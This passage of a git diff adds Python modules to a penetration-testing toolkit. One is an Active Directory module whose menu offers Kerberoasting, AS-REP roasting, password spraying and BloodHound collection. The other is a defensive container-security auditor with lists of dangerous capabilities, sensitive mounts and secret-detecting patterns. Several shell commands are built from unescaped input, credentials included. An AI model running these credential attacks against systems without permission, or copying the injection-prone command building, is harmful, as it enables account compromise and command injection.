'(msDS-AllowedToDelegateTo=*)' + attrs = ['sAMAccountName', 'dNSHostName', 'distinguishedName', + 'msDS-AllowedToDelegateTo', 'objectCategory', 'operatingSystem', + 'userAccountControl'] + + entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + servers = [] + for entry in entries: + delegate_to = entry.get('msDS-AllowedToDelegateTo', []) + if isinstance(delegate_to, str): + delegate_to = [delegate_to] + elif delegate_to is None: + delegate_to = [] + + uac = int(entry.get('userAccountControl', 0) or 0) + protocol_transition = bool(uac & 0x1000000) + + 
servers.append({ + 'name': entry.get('sAMAccountName', '').rstrip('$'), + 'dns_name': entry.get('dNSHostName', ''), + 'dn': entry.get('dn', ''), + 'os': entry.get('operatingSystem', ''), + 'allowed_to_delegate_to': delegate_to, + 'protocol_transition': protocol_transition, + 'risk': 'High' if protocol_transition else 'Medium', + }) + + self.results['constrained_delegation'] = servers + return {'servers': servers, 'count': len(servers)} + + # ========== BLOODHOUND ========== + + def bloodhound_collect(self, dc_host, domain, username, password): + """Run BloodHound data collection. + + Tries bloodhound-python (SharpHound equivalent) via subprocess, + falls back to manual LDAP-based collection. + """ + output_dir = self.data_dir / 'bloodhound' + output_dir.mkdir(parents=True, exist_ok=True) + ts = datetime.now().strftime('%Y%m%d_%H%M%S') + + collection_stats = { + 'users': 0, 'groups': 0, 'computers': 0, + 'sessions': 0, 'domains': 0, + 'files': [], 'method': '', 'timestamp': ts, + } + + # Try bloodhound-python + for cmd_prefix in ['bloodhound-python', 'python -m bloodhound']: + cmd = ( + f'{cmd_prefix} -u {username} -p {password} ' + f'-d {domain} -dc {dc_host} -c All ' + f'--zip -o {output_dir}' + ) + success, output = self._run_cmd(cmd, timeout=300) + if success: + collection_stats['method'] = 'bloodhound-python' + # Count output files + for f in output_dir.glob('*.json'): + collection_stats['files'].append(str(f.name)) + for f in output_dir.glob('*.zip'): + collection_stats['files'].append(str(f.name)) + # Parse counts from output + for line in output.splitlines(): + if 'users' in line.lower(): + try: + collection_stats['users'] = int(''.join(c for c in line.split()[-1] if c.isdigit()) or 0) + except ValueError: + pass + if 'groups' in line.lower(): + try: + collection_stats['groups'] = int(''.join(c for c in line.split()[-1] if c.isdigit()) or 0) + except ValueError: + pass + if 'computers' in line.lower(): + try: + collection_stats['computers'] = int(''.join(c 
for c in line.split()[-1] if c.isdigit()) or 0) + except ValueError: + pass + + self.results['bloodhound'] = collection_stats + self._save_results('bloodhound', collection_stats) + return { + 'success': True, + 'stats': collection_stats, + 'message': f'BloodHound collection complete via {cmd_prefix}' + } + + # Fallback: manual LDAP collection into BloodHound-compatible JSON + collection_stats['method'] = 'manual_ldap' + + # Collect users + user_result = self.enumerate_users() + users_data = user_result.get('users', []) + collection_stats['users'] = len(users_data) + users_file = output_dir / f'users_{ts}.json' + with open(users_file, 'w') as f: + json.dump({'data': users_data, 'meta': {'type': 'users', 'count': len(users_data)}}, f, indent=2, default=str) + collection_stats['files'].append(users_file.name) + + # Collect groups + group_result = self.enumerate_groups() + groups_data = group_result.get('groups', []) + collection_stats['groups'] = len(groups_data) + groups_file = output_dir / f'groups_{ts}.json' + with open(groups_file, 'w') as f: + json.dump({'data': groups_data, 'meta': {'type': 'groups', 'count': len(groups_data)}}, f, indent=2, default=str) + collection_stats['files'].append(groups_file.name) + + # Collect computers + comp_result = self.enumerate_computers() + comps_data = comp_result.get('computers', []) + collection_stats['computers'] = len(comps_data) + comps_file = output_dir / f'computers_{ts}.json' + with open(comps_file, 'w') as f: + json.dump({'data': comps_data, 'meta': {'type': 'computers', 'count': len(comps_data)}}, f, indent=2, default=str) + collection_stats['files'].append(comps_file.name) + + # Domain info + domain_info = { + 'name': self.domain, + 'dn': self.domain_dn, + 'dcs': self.results.get('dcs', []), + 'trusts': self.results.get('trusts', []), + } + collection_stats['domains'] = 1 + domain_file = output_dir / f'domains_{ts}.json' + with open(domain_file, 'w') as f: + json.dump({'data': [domain_info], 'meta': {'type': 
'domains', 'count': 1}}, f, indent=2, default=str) + collection_stats['files'].append(domain_file.name) + + self.results['bloodhound'] = collection_stats + self._save_results('bloodhound', collection_stats) + return { + 'success': True, + 'stats': collection_stats, + 'message': 'Manual LDAP collection complete (bloodhound-python not found — pip install bloodhound)' + } + + # ========== EXPORT ========== + + def export_results(self, fmt='json'): + """Export all collected enumeration and attack results.""" + ts = datetime.now().strftime('%Y%m%d_%H%M%S') + + export_data = { + 'metadata': { + 'timestamp': ts, + 'domain': self.domain, + 'dc_host': self.dc_host, + 'format': fmt, + }, + 'results': {} + } + + for key, value in self.results.items(): + if value: # Only include non-empty results + export_data['results'][key] = value + + if fmt == 'json': + path = self.data_dir / f'ad_audit_export_{ts}.json' + with open(path, 'w') as f: + json.dump(export_data, f, indent=2, default=str) + return {'success': True, 'path': str(path), 'format': 'json'} + + elif fmt == 'csv': + import csv + files = [] + for key, data in export_data['results'].items(): + if isinstance(data, list) and data: + path = self.data_dir / f'ad_audit_{key}_{ts}.csv' + with open(path, 'w', newline='') as f: + if isinstance(data[0], dict): + writer = csv.DictWriter(f, fieldnames=data[0].keys()) + writer.writeheader() + for row in data: + # Flatten lists to strings + flat = {} + for k, v in row.items(): + flat[k] = '; '.join(v) if isinstance(v, list) else v + writer.writerow(flat) + else: + writer = csv.writer(f) + for item in data: + writer.writerow([item]) + files.append(str(path)) + return {'success': True, 'files': files, 'format': 'csv'} + + return {'success': False, 'message': f'Unsupported format: {fmt}'} + + +# ========== SINGLETON ========== + +_instance = None + + +def get_ad_audit(): + """Get or create singleton ADToolkit instance.""" + global _instance + if _instance is None: + _instance = 
ADToolkit() + return _instance + + +# ========== CLI MENU ========== + +def run(): + """CLI menu for Active Directory Audit module.""" + clear_screen() + display_banner() + ad = get_ad_audit() + + while True: + print(f"\n{Colors.BOLD}{Colors.RED}Active Directory Audit{Colors.RESET}") + print(f"{Colors.DIM}LDAP enumeration, Kerberoasting, password spray, ACL analysis{Colors.RESET}\n") + + # Connection status + if ad.is_connected(): + print(f" {Colors.GREEN}Connected:{Colors.RESET} {ad.dc_host} ({ad.domain}) as {ad.username or 'anonymous'}") + else: + print(f" {Colors.YELLOW}Not connected{Colors.RESET}") + + print(f"\n {Colors.CYAN}1{Colors.RESET} - Connect to DC") + print(f" {Colors.CYAN}2{Colors.RESET} - Enumerate Users") + print(f" {Colors.CYAN}3{Colors.RESET} - Enumerate Groups") + print(f" {Colors.CYAN}4{Colors.RESET} - Kerberoast") + print(f" {Colors.CYAN}5{Colors.RESET} - AS-REP Roast") + print(f" {Colors.CYAN}6{Colors.RESET} - Password Spray") + print(f" {Colors.CYAN}7{Colors.RESET} - ACL Analysis") + print(f" {Colors.CYAN}8{Colors.RESET} - BloodHound Collect") + print(f" {Colors.CYAN}9{Colors.RESET} - Enumerate Computers") + print(f" {Colors.CYAN}10{Colors.RESET} - Find Admin Accounts") + print(f" {Colors.CYAN}11{Colors.RESET} - Find Delegation") + print(f" {Colors.CYAN}12{Colors.RESET} - Export Results") + print(f" {Colors.CYAN}0{Colors.RESET} - Back\n") + + choice = input(f"{Colors.WHITE}Select> {Colors.RESET}").strip() + + if choice == '0': + if ad.is_connected(): + ad.disconnect() + break + + elif choice == '1': + print(f"\n{Colors.BOLD}Connect to Domain Controller{Colors.RESET}") + dc_host = input(f" DC Host/IP: ").strip() + domain = input(f" Domain (e.g. corp.local): ").strip() + username = input(f" Username (blank=anonymous): ").strip() or None + password = None + if username: + import getpass + password = getpass.getpass(f" Password: ") or None + ssl = input(f" Use SSL/LDAPS? 
(y/N): ").strip().lower() == 'y' + + if dc_host and domain: + result = ad.connect(dc_host, domain, username, password, ssl) + status = 'success' if result['success'] else 'error' + ad.print_status(result['message'], status) + else: + ad.print_status('DC host and domain are required', 'error') + + elif choice == '2': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Enumerating users...', 'info') + result = ad.enumerate_users() + count = result.get('count', 0) + ad.print_status(f'Found {count} users', 'success') + for u in result.get('users', [])[:20]: + flags = ', '.join(u.get('uac_flags', [])[:3]) + status_icon = '+' if u.get('enabled') else '-' + print(f" [{status_icon}] {u['username']:<25} {u.get('display_name', ''):<25} {flags}") + if count > 20: + print(f" ... and {count - 20} more") + + elif choice == '3': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Enumerating groups...', 'info') + result = ad.enumerate_groups() + count = result.get('count', 0) + ad.print_status(f'Found {count} groups', 'success') + for g in result.get('groups', [])[:20]: + print(f" {g['name']:<35} Members: {g['member_count']:<5} {g['scope']}") + if count > 20: + print(f" ... 
and {count - 20} more") + + elif choice == '4': + print(f"\n{Colors.BOLD}Kerberoast{Colors.RESET}") + dc = input(f" DC Host/IP [{ad.dc_host or ''}]: ").strip() or ad.dc_host + dom = input(f" Domain [{ad.domain or ''}]: ").strip() or ad.domain + user = input(f" Username [{ad.username or ''}]: ").strip() or ad.username + import getpass + pwd = getpass.getpass(f" Password: ") or ad.password + if dc and dom and user and pwd: + ad.print_status('Running Kerberoast...', 'info') + result = ad.kerberoast(dc, dom, user, pwd) + ad.print_status(result.get('message', ''), 'success' if result.get('count', 0) > 0 else 'warning') + for h in result.get('hashes', []): + print(f" {h[:80]}...") + else: + ad.print_status('All fields required', 'error') + + elif choice == '5': + print(f"\n{Colors.BOLD}AS-REP Roast{Colors.RESET}") + dc = input(f" DC Host/IP [{ad.dc_host or ''}]: ").strip() or ad.dc_host + dom = input(f" Domain [{ad.domain or ''}]: ").strip() or ad.domain + ul = input(f" User list (comma-separated, blank=auto): ").strip() + userlist = [u.strip() for u in ul.split(',')] if ul else None + if dc and dom: + ad.print_status('Running AS-REP Roast...', 'info') + result = ad.asrep_roast(dc, dom, userlist) + ad.print_status(result.get('message', ''), 'success' if result.get('count', 0) > 0 else 'warning') + for h in result.get('hashes', []): + print(f" {h[:80]}...") + else: + ad.print_status('DC and domain required', 'error') + + elif choice == '6': + print(f"\n{Colors.BOLD}Password Spray{Colors.RESET}") + dc = input(f" DC Host/IP [{ad.dc_host or ''}]: ").strip() or ad.dc_host + dom = input(f" Domain [{ad.domain or ''}]: ").strip() or ad.domain + ul = input(f" User list (comma-separated): ").strip() + import getpass + pwd = getpass.getpass(f" Password to spray: ") + proto = input(f" Protocol (ldap/smb) [ldap]: ").strip() or 'ldap' + if dc and dom and ul and pwd: + users = [u.strip() for u in ul.split(',')] + ad.print_status(f'Spraying {len(users)} users with protocol={proto}...', 
'info') + result = ad.password_spray(users, pwd, dc, dom, proto) + ad.print_status( + f'Done: {result["success_count"]} success, ' + f'{result["failure_count"]} failed, ' + f'{result["lockout_count"]} lockouts', + 'success' + ) + for r in result.get('results', []): + color = Colors.GREEN if r['status'] == 'success' else (Colors.RED if r['status'] == 'lockout' else Colors.DIM) + print(f" {color}{r['username']:<25} {r['status']:<12} {r['message']}{Colors.RESET}") + else: + ad.print_status('All fields required', 'error') + + elif choice == '7': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Analyzing ACLs...', 'info') + result = ad.analyze_acls() + count = result.get('count', 0) + ad.print_status(f'Found {count} ACL findings', 'success') + for f in result.get('findings', []): + risk_color = Colors.RED if f['risk'] == 'Critical' else (Colors.YELLOW if f['risk'] == 'High' else Colors.DIM) + print(f" {risk_color}[{f['risk']}]{Colors.RESET} {f['target']}: {f['permission']}") + + elif choice == '8': + print(f"\n{Colors.BOLD}BloodHound Collection{Colors.RESET}") + dc = input(f" DC Host/IP [{ad.dc_host or ''}]: ").strip() or ad.dc_host + dom = input(f" Domain [{ad.domain or ''}]: ").strip() or ad.domain + user = input(f" Username [{ad.username or ''}]: ").strip() or ad.username + import getpass + pwd = getpass.getpass(f" Password: ") or ad.password + if dc and dom and user and pwd: + ad.print_status('Running BloodHound collection (this may take a while)...', 'info') + result = ad.bloodhound_collect(dc, dom, user, pwd) + ad.print_status(result.get('message', ''), 'success' if result.get('success') else 'error') + stats = result.get('stats', {}) + print(f" Users: {stats.get('users', 0)} Groups: {stats.get('groups', 0)} Computers: {stats.get('computers', 0)}") + print(f" Files: {', '.join(stats.get('files', []))}") + else: + ad.print_status('All fields required', 'error') + + elif choice == '9': + if not 
ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Enumerating computers...', 'info') + result = ad.enumerate_computers() + count = result.get('count', 0) + ad.print_status(f'Found {count} computers', 'success') + for c in result.get('computers', [])[:20]: + deleg = ' [UNCONSTRAINED DELEG]' if c.get('trusted_for_delegation') else '' + print(f" {c['name']:<25} {c.get('os', ''):<30} {c.get('dns_name', '')}{deleg}") + + elif choice == '10': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Finding admin accounts...', 'info') + result = ad.find_admin_accounts() + for grp in result.get('admins', []): + print(f"\n {Colors.BOLD}{grp['group']}{Colors.RESET} ({grp['count']} members)") + for m in grp.get('members', []): + status_icon = Colors.GREEN + '+' if m['enabled'] else Colors.RED + '-' + print(f" [{status_icon}{Colors.RESET}] {m['username']:<25} {m.get('display_name', '')}") + + elif choice == '11': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Finding delegation configurations...', 'info') + uc = ad.find_unconstrained_delegation() + cc = ad.find_constrained_delegation() + print(f"\n {Colors.BOLD}Unconstrained Delegation:{Colors.RESET} {uc.get('count', 0)} servers") + for s in uc.get('servers', []): + print(f" {Colors.RED}[HIGH]{Colors.RESET} {s['name']} ({s.get('os', '')})") + print(f"\n {Colors.BOLD}Constrained Delegation:{Colors.RESET} {cc.get('count', 0)} servers") + for s in cc.get('servers', []): + print(f" [{s['risk']}] {s['name']} -> {', '.join(s.get('allowed_to_delegate_to', []))}") + + elif choice == '12': + fmt = input(f" Format (json/csv) [json]: ").strip() or 'json' + result = ad.export_results(fmt) + if result.get('success'): + ad.print_status(f'Exported to: {result.get("path", "") or ", ".join(result.get("files", []))}', 'success') + else: + 
ad.print_status(result.get('message', 'Export failed'), 'error') + + else: + ad.print_status('Invalid selection', 'warning') + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") diff --git a/modules/container_sec.py b/modules/container_sec.py new file mode 100644 index 0000000..70203a3 --- /dev/null +++ b/modules/container_sec.py @@ -0,0 +1,1482 @@ +"""AUTARCH Container Security + +Docker auditing, Kubernetes assessment, container image scanning, +escape detection, Dockerfile linting, and runtime monitoring. +""" + +DESCRIPTION = "Container security — Docker & Kubernetes auditing" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "defense" + +import os +import re +import sys +import json +import subprocess +import platform +import time +from pathlib import Path +from datetime import datetime +from typing import Dict, List, Optional, Any + +try: + from core.paths import get_data_dir, find_tool +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + import shutil + + def find_tool(name): + return shutil.which(name) + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = YELLOW = GREEN = CYAN = WHITE = DIM = RESET = BOLD = '' + + def clear_screen(): + pass + + def display_banner(): + pass + + +# ── Dangerous Docker capabilities ─────────────────────────────────────────── + +DANGEROUS_CAPS = [ + 'SYS_ADMIN', 'NET_ADMIN', 'SYS_PTRACE', 'SYS_RAWIO', + 'DAC_OVERRIDE', 'FOWNER', 'NET_RAW', 'MKNOD', 'SYS_CHROOT', + 'AUDIT_WRITE', 'SETFCAP', 'MAC_OVERRIDE', 'MAC_ADMIN', + 'SYSLOG', 'DAC_READ_SEARCH', 'LINUX_IMMUTABLE', 'SYS_BOOT', + 'SYS_MODULE', 'SYS_TIME', 'KILL', +] + +SENSITIVE_MOUNTS = [ + '/var/run/docker.sock', '/run/docker.sock', + '/proc', '/sys', '/dev', '/etc/shadow', '/etc/passwd', + '/root', '/home', '/var/log', +] + +DEFAULT_SECCOMP_PROFILE = 'runtime/default' + +# ── Dockerfile Lint Rules 
─────────────────────────────────────────────────── + +DOCKERFILE_RULES = { + 'DL001': {'severity': 'high', 'title': 'FROM uses :latest tag', + 'desc': 'Pin image versions for reproducible builds.'}, + 'DL002': {'severity': 'high', 'title': 'No USER directive', + 'desc': 'Container runs as root by default. Add a USER directive.'}, + 'DL003': {'severity': 'medium', 'title': 'ADD used instead of COPY', + 'desc': 'Use COPY for local files. ADD auto-extracts and supports URLs.'}, + 'DL004': {'severity': 'high', 'title': 'Secrets in ENV/ARG', + 'desc': 'Avoid passing secrets via ENV or ARG. Use build secrets.'}, + 'DL005': {'severity': 'low', 'title': 'Missing HEALTHCHECK', + 'desc': 'Add HEALTHCHECK for container orchestration readiness.'}, + 'DL006': {'severity': 'medium', 'title': 'apt-get without --no-install-recommends', + 'desc': 'Use --no-install-recommends to reduce image size.'}, + 'DL007': {'severity': 'low', 'title': 'Missing cache cleanup', + 'desc': 'Run apt-get clean / rm -rf /var/lib/apt/lists/* after install.'}, + 'DL008': {'severity': 'medium', 'title': 'EXPOSE all interfaces', + 'desc': 'Avoid EXPOSE with 0.0.0.0; bind to specific interfaces.'}, + 'DL009': {'severity': 'high', 'title': 'COPY / ADD of sensitive files', + 'desc': 'Avoid copying .env, credentials, or private keys into image.'}, + 'DL010': {'severity': 'medium', 'title': 'Using sudo in RUN', + 'desc': 'Avoid sudo in Dockerfiles. 
Use USER directive instead.'}, + 'DL011': {'severity': 'low', 'title': 'Multiple consecutive RUN commands', + 'desc': 'Chain RUN commands with && to reduce layers.'}, +} + +SECRET_PATTERNS = re.compile( + r'(password|secret|token|api_key|apikey|access_key|private_key|' + r'aws_secret|db_pass|database_url|auth_token)', + re.IGNORECASE +) + +SENSITIVE_FILE_PATTERNS = re.compile( + r'\.(pem|key|p12|pfx|env|credentials|htpasswd|pgpass)$', + re.IGNORECASE +) + + +# ── ContainerSecurity Class ───────────────────────────────────────────────── + +class ContainerSecurity: + """Docker and Kubernetes security auditing engine.""" + + _instance = None + + def __init__(self): + data = Path(str(get_data_dir())) / 'container_sec' + data.mkdir(parents=True, exist_ok=True) + self._data_dir = data + self._results_path = data / 'results.json' + self._results = { + 'docker_host': [], + 'container_audits': {}, + 'image_scans': {}, + 'dockerfile_lints': [], + 'k8s_audits': {}, + 'escape_checks': {}, + 'timestamp': None, + } + self._is_win = platform.system() == 'Windows' + + # ── helpers ────────────────────────────────────────────────────────────── + + def _run(self, cmd: str, timeout: int = 30) -> tuple: + """Run a shell command. Returns (success: bool, stdout: str).""" + try: + result = subprocess.run( + cmd, shell=True, capture_output=True, text=True, timeout=timeout + ) + return result.returncode == 0, result.stdout.strip() + except subprocess.TimeoutExpired: + return False, 'Command timed out' + except Exception as e: + return False, str(e) + + def _run_json(self, cmd: str, timeout: int = 30) -> tuple: + """Run command expecting JSON output. 
Returns (success, parsed_data).""" + ok, raw = self._run(cmd, timeout=timeout) + if not ok: + return False, raw + try: + return True, json.loads(raw) + except (json.JSONDecodeError, ValueError): + return False, raw + + def _save_results(self): + self._results['timestamp'] = datetime.utcnow().isoformat() + try: + with open(self._results_path, 'w') as f: + json.dump(self._results, f, indent=2, default=str) + except Exception: + pass + + # ── tool checks ────────────────────────────────────────────────────────── + + def check_docker_installed(self) -> dict: + """Check if Docker CLI is available.""" + docker = find_tool('docker') + if not docker: + return {'installed': False, 'path': None, 'version': None} + ok, ver = self._run(f'"{docker}" --version') + return { + 'installed': True, + 'path': docker, + 'version': ver if ok else 'unknown', + } + + def check_kubectl_installed(self) -> dict: + """Check if kubectl CLI is available.""" + kubectl = find_tool('kubectl') + if not kubectl: + return {'installed': False, 'path': None, 'version': None, 'context': None} + ok, ver = self._run(f'"{kubectl}" version --client --short 2>/dev/null || "{kubectl}" version --client') + ctx_ok, ctx = self._run(f'"{kubectl}" config current-context 2>/dev/null') + return { + 'installed': True, + 'path': kubectl, + 'version': ver if ok else 'unknown', + 'context': ctx if ctx_ok else None, + } + + # ── Docker Host Audit ──────────────────────────────────────────────────── + + def audit_docker_host(self) -> list: + """Comprehensive Docker host security audit.""" + findings = [] + docker = find_tool('docker') + if not docker: + return [{'check': 'Docker CLI', 'severity': 'critical', + 'status': 'fail', 'detail': 'Docker not found on system'}] + + # 1. 
Daemon configuration + daemon_cfg_path = '/etc/docker/daemon.json' + if self._is_win: + daemon_cfg_path = os.path.expandvars(r'%ProgramData%\docker\config\daemon.json') + + daemon_cfg = {} + if os.path.isfile(daemon_cfg_path): + try: + with open(daemon_cfg_path) as f: + daemon_cfg = json.load(f) + findings.append({ + 'check': 'Daemon Config', + 'severity': 'info', + 'status': 'pass', + 'detail': f'Found {daemon_cfg_path}', + }) + except Exception as e: + findings.append({ + 'check': 'Daemon Config', + 'severity': 'medium', + 'status': 'warn', + 'detail': f'Cannot parse {daemon_cfg_path}: {e}', + }) + else: + findings.append({ + 'check': 'Daemon Config', + 'severity': 'medium', + 'status': 'warn', + 'detail': f'No daemon.json found at {daemon_cfg_path}', + }) + + # 2. Docker socket permissions (Linux only) + if not self._is_win: + sock = '/var/run/docker.sock' + if os.path.exists(sock): + try: + stat = os.stat(sock) + mode = oct(stat.st_mode)[-3:] + world_rw = mode[2] in ('6', '7', '2', '3') + if world_rw: + findings.append({ + 'check': 'Docker Socket Permissions', + 'severity': 'high', + 'status': 'fail', + 'detail': f'{sock} is world-accessible (mode {mode}). Restrict to docker group.', + }) + else: + findings.append({ + 'check': 'Docker Socket Permissions', + 'severity': 'info', + 'status': 'pass', + 'detail': f'{sock} permissions: {mode}', + }) + except Exception: + findings.append({ + 'check': 'Docker Socket Permissions', + 'severity': 'low', + 'status': 'warn', + 'detail': 'Cannot stat docker socket', + }) + + # 3. TLS configuration + tls_verify = daemon_cfg.get('tls', False) or daemon_cfg.get('tlsverify', False) + if tls_verify: + findings.append({ + 'check': 'TLS Configuration', + 'severity': 'info', + 'status': 'pass', + 'detail': 'Docker daemon TLS is enabled', + }) + else: + findings.append({ + 'check': 'TLS Configuration', + 'severity': 'medium', + 'status': 'warn', + 'detail': 'Docker daemon TLS is not configured in daemon.json', + }) + + # 4. 
User namespace remapping + userns = daemon_cfg.get('userns-remap', '') + if userns: + findings.append({ + 'check': 'User Namespace Remapping', + 'severity': 'info', + 'status': 'pass', + 'detail': f'Remapped to: {userns}', + }) + else: + findings.append({ + 'check': 'User Namespace Remapping', + 'severity': 'medium', + 'status': 'warn', + 'detail': 'Not enabled. Containers run as host UID 0.', + }) + + # 5. Content trust + content_trust = os.environ.get('DOCKER_CONTENT_TRUST', '0') + if content_trust == '1': + findings.append({ + 'check': 'Content Trust (DCT)', + 'severity': 'info', + 'status': 'pass', + 'detail': 'DOCKER_CONTENT_TRUST=1 — signed images enforced', + }) + else: + findings.append({ + 'check': 'Content Trust (DCT)', + 'severity': 'low', + 'status': 'warn', + 'detail': 'DOCKER_CONTENT_TRUST not set. Unsigned images accepted.', + }) + + # 6. Live restore + live_restore = daemon_cfg.get('live-restore', False) + if live_restore: + findings.append({ + 'check': 'Live Restore', + 'severity': 'info', + 'status': 'pass', + 'detail': 'Containers survive daemon restarts', + }) + else: + findings.append({ + 'check': 'Live Restore', + 'severity': 'low', + 'status': 'warn', + 'detail': 'live-restore not enabled in daemon.json', + }) + + # 7. Logging driver + log_driver = daemon_cfg.get('log-driver', 'json-file') + log_opts = daemon_cfg.get('log-opts', {}) + max_size = log_opts.get('max-size', 'unlimited') + findings.append({ + 'check': 'Logging Driver', + 'severity': 'low' if log_driver == 'json-file' and max_size == 'unlimited' else 'info', + 'status': 'warn' if max_size == 'unlimited' else 'pass', + 'detail': f'Driver: {log_driver}, max-size: {max_size}', + }) + + # 8. 
Docker info — check swarm, runtimes + ok, info_raw = self._run(f'"{docker}" info --format "{{{{json .}}}}"') + if ok: + try: + info = json.loads(info_raw) + # Check default runtime + rt = info.get('DefaultRuntime', 'runc') + findings.append({ + 'check': 'Default Runtime', + 'severity': 'info', + 'status': 'pass' if rt in ('runc', 'crun') else 'info', + 'detail': f'Runtime: {rt}', + }) + # Swarm mode + swarm = info.get('Swarm', {}) + swarm_active = swarm.get('LocalNodeState', 'inactive') == 'active' + if swarm_active: + findings.append({ + 'check': 'Swarm Mode', + 'severity': 'info', + 'status': 'info', + 'detail': 'Swarm is active. Ensure manager auto-lock is enabled.', + }) + except (json.JSONDecodeError, ValueError): + pass + + self._results['docker_host'] = findings + self._save_results() + return findings + + # ── Container Listing / Inspection ─────────────────────────────────────── + + def list_containers(self, all: bool = True) -> list: + """List Docker containers.""" + docker = find_tool('docker') + if not docker: + return [] + + flag = '-a' if all else '' + fmt = '{{json .}}' + ok, raw = self._run(f'"{docker}" ps {flag} --format "{fmt}"') + if not ok: + return [] + + containers = [] + for line in raw.splitlines(): + line = line.strip() + if not line: + continue + try: + c = json.loads(line) + containers.append({ + 'id': c.get('ID', ''), + 'name': c.get('Names', ''), + 'image': c.get('Image', ''), + 'status': c.get('Status', ''), + 'ports': c.get('Ports', ''), + 'created': c.get('CreatedAt', ''), + 'state': c.get('State', ''), + }) + except (json.JSONDecodeError, ValueError): + continue + return containers + + def inspect_container(self, container_id: str) -> dict: + """Inspect a container and extract security-relevant config.""" + docker = find_tool('docker') + if not docker: + return {'error': 'Docker not found'} + + ok, data = self._run_json(f'"{docker}" inspect {container_id}') + if not ok or not isinstance(data, list) or len(data) == 0: + return 
{'error': f'Cannot inspect container {container_id}'} + + info = data[0] + host_cfg = info.get('HostConfig', {}) + cfg = info.get('Config', {}) + + # Capabilities + cap_add = host_cfg.get('CapAdd') or [] + cap_drop = host_cfg.get('CapDrop') or [] + + # Mounts + mounts = [] + for m in info.get('Mounts', []): + mounts.append({ + 'source': m.get('Source', ''), + 'destination': m.get('Destination', ''), + 'mode': m.get('Mode', ''), + 'rw': m.get('RW', True), + 'type': m.get('Type', ''), + }) + + # Security options + sec_opts = host_cfg.get('SecurityOpt') or [] + + return { + 'id': info.get('Id', '')[:12], + 'name': info.get('Name', '').lstrip('/'), + 'image': cfg.get('Image', ''), + 'privileged': host_cfg.get('Privileged', False), + 'cap_add': cap_add, + 'cap_drop': cap_drop, + 'mounts': mounts, + 'network_mode': host_cfg.get('NetworkMode', ''), + 'user': cfg.get('User', '') or 'root', + 'pid_mode': host_cfg.get('PidMode', ''), + 'ipc_mode': host_cfg.get('IpcMode', ''), + 'read_only_rootfs': host_cfg.get('ReadonlyRootfs', False), + 'security_opt': sec_opts, + 'memory_limit': host_cfg.get('Memory', 0), + 'cpu_shares': host_cfg.get('CpuShares', 0), + 'pids_limit': host_cfg.get('PidsLimit', 0), + 'restart_policy': host_cfg.get('RestartPolicy', {}).get('Name', ''), + 'env': cfg.get('Env', []), + } + + # ── Container Security Audit ───────────────────────────────────────────── + + def audit_container(self, container_id: str) -> dict: + """Full security audit of a running container.""" + info = self.inspect_container(container_id) + if 'error' in info: + return info + + findings = [] + passed = 0 + total = 0 + + def check(name, ok, detail='', severity='medium'): + nonlocal passed, total + total += 1 + if ok: + passed += 1 + findings.append({ + 'check': name, + 'status': 'pass' if ok else 'fail', + 'severity': severity if not ok else 'info', + 'detail': detail, + }) + + # 1. 
Privileged mode + check('Privileged Mode', + not info['privileged'], + 'Container is running in privileged mode!' if info['privileged'] + else 'Not privileged', + severity='critical') + + # 2. Dangerous capabilities + dangerous_found = [c for c in info['cap_add'] if c in DANGEROUS_CAPS] + check('Capabilities', + len(dangerous_found) == 0, + f'Dangerous capabilities added: {", ".join(dangerous_found)}' if dangerous_found + else f'No dangerous capabilities ({len(info["cap_drop"])} dropped)', + severity='high') + + # 3. Sensitive mounts + sensitive_found = [] + for m in info['mounts']: + for s in SENSITIVE_MOUNTS: + if m['destination'].startswith(s) or m['source'].startswith(s): + sensitive_found.append(f'{m["source"]} -> {m["destination"]}') + break + check('Sensitive Mounts', + len(sensitive_found) == 0, + f'Sensitive paths mounted: {"; ".join(sensitive_found)}' if sensitive_found + else 'No sensitive host paths mounted', + severity='high') + + # 4. Running as root + check('User', + info['user'] not in ('', 'root', '0'), + f'Running as: {info["user"]}' if info['user'] not in ('', 'root', '0') + else 'Running as root. Use USER directive.', + severity='medium') + + # 5. Read-only root filesystem + check('Read-only Rootfs', + info['read_only_rootfs'], + 'Root filesystem is read-only' if info['read_only_rootfs'] + else 'Root filesystem is writable. Consider --read-only.', + severity='low') + + # 6. Resource limits — memory + check('Memory Limit', + info['memory_limit'] > 0, + f'Memory limit: {info["memory_limit"] // (1024*1024)}MB' if info['memory_limit'] > 0 + else 'No memory limit set. Container can exhaust host memory.', + severity='medium') + + # 7. Resource limits — PID + pids = info['pids_limit'] + has_pids = pids is not None and pids > 0 and pids != -1 + check('PID Limit', + has_pids, + f'PID limit: {pids}' if has_pids + else 'No PID limit. Fork bomb possible.', + severity='low') + + # 8. 
Seccomp profile + seccomp_set = any('seccomp' in opt for opt in info['security_opt']) + no_seccomp = any('seccomp=unconfined' in opt for opt in info['security_opt']) + check('Seccomp Profile', + seccomp_set and not no_seccomp, + 'Seccomp profile disabled (unconfined)!' if no_seccomp + else ('Custom seccomp profile applied' if seccomp_set + else 'Default seccomp profile (OK for Docker default)'), + severity='high' if no_seccomp else 'low') + + # 9. AppArmor profile + apparmor_set = any('apparmor' in opt for opt in info['security_opt']) + no_apparmor = any('apparmor=unconfined' in opt for opt in info['security_opt']) + check('AppArmor Profile', + not no_apparmor, + 'AppArmor disabled (unconfined)!' if no_apparmor + else ('AppArmor profile applied' if apparmor_set + else 'No explicit AppArmor profile (using Docker default)'), + severity='medium' if no_apparmor else 'low') + + # 10. Network mode + check('Network Mode', + info['network_mode'] not in ('host',), + f'Network mode: {info["network_mode"]}', + severity='high' if info['network_mode'] == 'host' else 'info') + + # 11. PID mode + check('PID Mode', + info['pid_mode'] != 'host', + 'PID namespace shared with host!' if info['pid_mode'] 